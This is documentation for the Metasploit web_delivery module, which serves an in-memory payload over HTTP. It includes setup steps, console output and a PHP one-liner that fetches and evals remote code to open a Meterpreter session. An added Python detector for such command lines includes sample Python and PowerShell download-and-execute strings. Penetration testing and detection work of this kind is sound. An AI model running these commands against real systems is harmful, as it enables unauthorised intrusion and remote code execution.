metasploit-gs/documentation/modules/exploit/multi/script/web_delivery.md

The web_delivery module runs a web server that delivers a payload during post-exploitation. This delivery is stealthy because the payload does not touch the disk.

Currently, web_delivery supports three different languages for delivery: Python, PHP, and PowerShell. You should be able to tell which one you can use based on the target environment you are in.

For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're on a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports PowerShell.

Verification Steps

To use the web_delivery module, you must first gain access to the target machine, with the ability to execute the Python, PHP, or PowerShell interpreter.

At that point, you would use the web_delivery module as in the following example:

  1. Start msfconsole
  2. Run: use exploit/multi/script/web_delivery
  3. Run: set target 1 (1 is PHP. You can use show targets to see other options)
  4. Run: set PAYLOAD php/meterpreter/reverse_tcp (You can do show payloads to see what options are suitable for the target)
  5. Run: set LHOST IP (The IP the payload should connect back to)
  6. Do: run
  7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
  8. Copy the command. Depending on your pentesting scenario, you can either inject the command and get code execution, or run it from the target's shell and get a session:
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.23.1:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
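
A defender's view of the command printed above, as an added example that is not part of the original module documentation: since the payload never touches disk, the interpreter's command line in process-creation telemetry is one of the few host artifacts left to match on. The sketch flags inline interpreter invocations that fetch a URL and execute the result. The PHP rule follows the printed command, while the Python and PowerShell rules, the function names, and every sample event other than that PHP command are constructed assumptions.

```python
import re

# One rule per interpreter: (name, inline-code invocation, remote fetch, dynamic execution).
# The PHP rule follows the command in the console output above; the Python and
# PowerShell rules are assumptions built from common fetch-and-execute idioms.
RULES = [
    ("php", r"\bphp[\d.]*(\.exe)?\b.*\s-r\s",
     r"file_get_contents\s*\(|curl_exec\s*\(", r"\b(eval|assert)\s*\("),
    ("python", r"\bpython[\d.]*(\.exe)?\b.*\s-c\s",
     r"urlopen\s*\(|requests\.get\s*\(", r"\b(exec|eval)\s*\("),
    ("powershell", r"\b(powershell|pwsh)(\.exe)?\b",
     r"downloadstring|invoke-webrequest|\biwr\b", r"\biex\b|invoke-expression"),
]
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
INI_OVERRIDE = re.compile(r"-d\s+allow_url_fopen\s*=\s*(true|1|on)\b", re.I)


def classify(cmdline):
    """Return a finding dict if cmdline fetches remote code and executes it in memory."""
    for name, invoke, fetch, execute in RULES:
        if not re.search(invoke, cmdline, re.I):
            continue
        url = URL.search(cmdline)
        if url and re.search(fetch, cmdline, re.I) and re.search(execute, cmdline, re.I):
            return {"interpreter": name, "url": url.group(0),
                    "ini_override": bool(INI_OVERRIDE.search(cmdline))}  # php.ini bypassed
    return None


def scan(events):
    """events: iterable of (host, cmdline) pairs from process-creation telemetry."""
    return [(host, f) for host, cmd in events if (f := classify(cmd))]


# Constructed process-creation records (for example auditd EXECVE or Sysmon event ID 1).
SAMPLE_EVENTS = [
    ("web01", "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));\""),
    ("web01", "php -r \"echo file_get_contents('http://127.0.0.1/health');\""),  # fetch, no eval
    ("web02", "php artisan migrate --force"),
    ("app03", "python3 -c \"import sys; print(sys.version)\""),
    ("app03", "python3 -c \"from urllib.request import urlopen; exec(urlopen('http://192.0.2.10/x').read())\""),
    ("win04", "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/y')"),
]

if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding)
```

Requiring both a fetch and an execute primitive keeps health checks and version probes out of the results; the `ini_override` field records when `allow_url_fopen` was forced on from the command line despite the server's php.ini.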

Targets

Python

Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.

PHP

PHP is a fairly popular language for web servers, especially Apache.

PowerShell/Windows

PowerShell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with PowerShell by default. Older Windows systems such as XP don't come with it by default, but it is still possible to see it installed on a corporate network.

Scenarios

Against a compromised web application

web_delivery would work nicely for a web application with a command execution vulnerability.

One way to approach this would be:

  1. Start exploit/multi/script/web_delivery
  2. Use Burp Suite to intercept the HTTP/HTTPS request, and place the command in the parameter that results in arbitrary code execution.
  3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.

Shell upgrade

web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.

Here's how that can be done:

  1. Start exploit/multi/script/web_delivery that generates/
  2. In msfconsole, interact with the shell, and copy/paste the command.
  3. You should get a Meterpreter session.